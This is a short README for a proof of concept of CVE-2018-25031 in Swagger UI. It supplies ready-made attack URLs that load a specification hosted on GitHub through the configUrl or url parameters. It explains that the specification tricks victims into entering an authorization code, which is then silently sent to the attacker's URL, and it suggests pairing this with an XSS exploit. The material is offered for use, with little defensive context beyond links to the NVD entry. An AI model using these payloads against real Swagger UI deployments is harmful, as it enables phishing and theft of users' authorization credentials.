A simple POC (CVE-2018-25031) that tricks the victim into entering the authorization code, which is then sent to the attacker.
You can use it with the XSS Vulnerability https://github.com/VictorNS69/swagger-ui-xss
It is necessary to find the parameter and assign the correct file: for configUrl, the JSON file, and for url, the YAML file.
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml
When the victim tries to use the API by entering the Authorization Code and clicks Execute, nothing will be displayed to them. However, a request with Authorization Code will be sent to the attacker's URL.
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031